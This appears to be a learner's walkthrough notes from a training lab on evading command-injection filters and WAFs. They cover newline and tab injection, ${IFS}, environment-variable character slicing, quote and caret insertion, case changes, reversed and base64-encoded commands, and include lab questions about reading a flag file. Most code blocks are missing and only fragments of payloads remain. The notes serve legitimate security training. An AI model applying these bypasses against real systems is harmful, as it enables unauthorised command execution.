🦹♂️Filter Evasion
A type of injection mitigation is utilizing blacklisted characters and words on the back-end to detect injection attempts and deny the request if any request contained them.
Filter/WAF Detection
Let's take a boosted version of our host checker with thome mitigations ->
This could be the back end code that checks for those chars:
Bypass Blacklisted Spaces
We see that the newline operators does not block our request:
But with the whoami added, and the space encoded it still blocks:
So let's get rid off whoami and check if the space is the char blocking:
It's good to know that Using tabs (%09) instead of spaces is a technique that may work, as both Linux and Windows accept commands with tabs between arguments so let's try 127.0.0.1%0a%09
Let's try with another technique Using the ($IFS) Linux Environment Variable may also work since its default value is a space and a tab, which would work between command arguments. So, if we use ${IFS}
where the spaces should be, the variable should be automatically replaced with a space, and our command should work. 127.0.0.1%0a${IFS}
There are many other methods we can utilize to bypass space filters, we can use the Bash Brace Expansion
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
Bypass Blacklisted Characters
Linux
${IFS}
is a magical environment variable but there are not that for other interesting chars, let's get creative and use the variables we know to get our chars through the filters ->
So if we print our
And we can't forget $HOME
or $PWD
Windows
we can echo
a Windows variable (%HOMEPATH%
-> \Users\htb-student
), and then specify a starting position (~6
-> \htb-student
), and finally specifying a negative end position, which in this case is the length of the username htb-student
(-11
-> \
)
Character Shifting
This is a nice techniques to produce the required characters without using them
all we have to do is find the character in the ASCII table that is just before our needed character
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
Bypassing Blacklisted Commands
A command blacklist usually consists of a set of words, and if we can obfuscate our commands and make them look different, we may be able to bypass the filters.
Here is the code for a basic command blacklist:
this code is looking for an exact match of the provided command, so if we send a slightly different command, it may not get blocked.
Linux & Windows
It's good to know that '
and a double-quote "
are usually ignored by command shells like Bash
or PowerShell
and will execute the same command as if they were not there.
The important things to remember are that we cannot mix types of quotes
and the number of quotes must be even
.
Linux Only
The chars that are not taken in account by bash include the backslash \
and the positional parameter character $@
. This works exactly as it did with the quotes, but in this case, the number of characters do not have to be even
Windows Only
(^
) can be injected
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
Advanced Command Obfuscation
When dealing with Web Application Firewalls (WAFs), and basic evasion techniques may not necessarily work
We can try inverting the character cases of a command (e.g. WHOAMI
) or alternating between cases (e.g. WhOaMi
). This usually works because a command blacklist may not check for different case variations of a single word
with a Windows server PowerShell and CMD are case-insensitive
However, when it comes to Linux and a bash shell, which are case-sensitive So we can try
So if we try it in burp:
It does not work because of the spaces disguised as +
We can try the follwoing command as well
Reversed Commands
Another fun way of playing around with WAFs is to reverse the commands
So we can create a environment variable:
The same can be applied in Windows
Encoded Commands
We can utilize various encoding tools, like base64
(for b64 encoding) or xxd
(for hex encoding).
We use the same technique with Windows as well.
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
But for some reason it does not execute my command
I forgot the %09
Last updated